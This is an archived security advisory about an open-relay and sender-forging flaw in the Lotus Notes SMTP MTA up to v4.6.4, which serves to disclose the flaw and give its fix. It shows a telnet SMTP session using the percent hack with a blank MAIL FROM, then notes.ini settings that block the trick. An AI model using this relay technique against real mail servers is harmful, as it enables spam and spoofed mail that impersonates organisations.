TUCoPS :: IBM(multi) :: notes05.htm

Lotus Notes - message relaying and "forging" 
Vulnerability

    Lotus Notes

Affected

    Lotus Notes MTA (up to v4.6.4)

Description

    Robert Lister found following.  Vulnerability about NTMail having
    open relaying ability, as describes at:

        http://oliver.efri.hr/~crv/security/bugs/NT/ntmail2.html

    in certain  situations Robert  has identified  a problem  with the
    Lotus  SMTP  MTA  (right  up  to  v4.6.4,  yet  to test Domino 5).
    Basically, it's possible  to relay (and  even appear to  "forge" a
    message) using  a combination  of the  percent hack  and the blank
    from address, and this  is *despite* having changed  the notes.ini
    with the settings for anti-relaying:

        telnet server 25
        Connected to 192.168.100.1.
        Escape character is '^]'.
        220 company.com Lotus SMTP MTA Service Ready
        HELO some.domain
        250 company.com
        MAIL FROM:<>
        250 OK
        RCPT TO:<recipient%remote.domain.net@company.com>
        250 OK
        DATA
        From: ... etc

        whaterver you like..

        .
        250 Message received OK.
        quit
        221 GoodBye

    The bad  bit of  this is  that notes  seems to  strip out previous
    headers (depending on how it's  configured)  and add new  outgoing
    notes  headers,  and  it  even  goes  as  far  as doing thigs like
    expanding  cc:headers  and  permitting  sending  to  notes mailing
    lists, etc,  making it  look like  mail originated  from the notes
    domain itself.   It also takes  whatever you put  in the "From:  "
    header and presents this in its outgoing "MAIL FROM:<>"

    Seems like Lotus SMTP  MTA also likes to  accept any mail for  any
    domain, and then, only having  accepted it, make a decision  as to
    what to do  with it.   If it decides  that it cannot  relay it, it
    generates a message  back to the  "sender" that "this  server will
    not relay"  however, 9  times of  of 10,  the remote  domain won't
    exist, so this message will fail - as opposed to responding  with,
    say, 5xx relaying   not permitted before   accepting the  message.
    Possibly not the best use of the protocol!

Solution

    Lotus  support  has  been  contacted  and they have confirmed that
    this is an issue and are looking in to it.   This will work UNLESS
    the two below notes.ini settings are set.

        smtpmta_allow_known_domains=1
        smtp_och_reject_smtp_originated_messages=1

    So:

        Connected to 192.168.100.1.
        Escape character is '^]'.
        220 company.com Lotus SMTP MTA Service Ready
        HELO some.company
        250 company.com
        MAIL FROM:<>
        250 OK
        RCPT TO:<recipient%remote.domain.net@company.com.com>
        501 This MTA is configured NOT to relay message from [some.server.com] to
        [company.com.com].
        quit
        221 GoodBye

    This is  a new  SMTPMTA setting  from R4.6.4  onward (still tested
    server permits to relay using  the mentioned percent hack, IF  the
    domain after the @ sign is the same as the server's domain name).

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH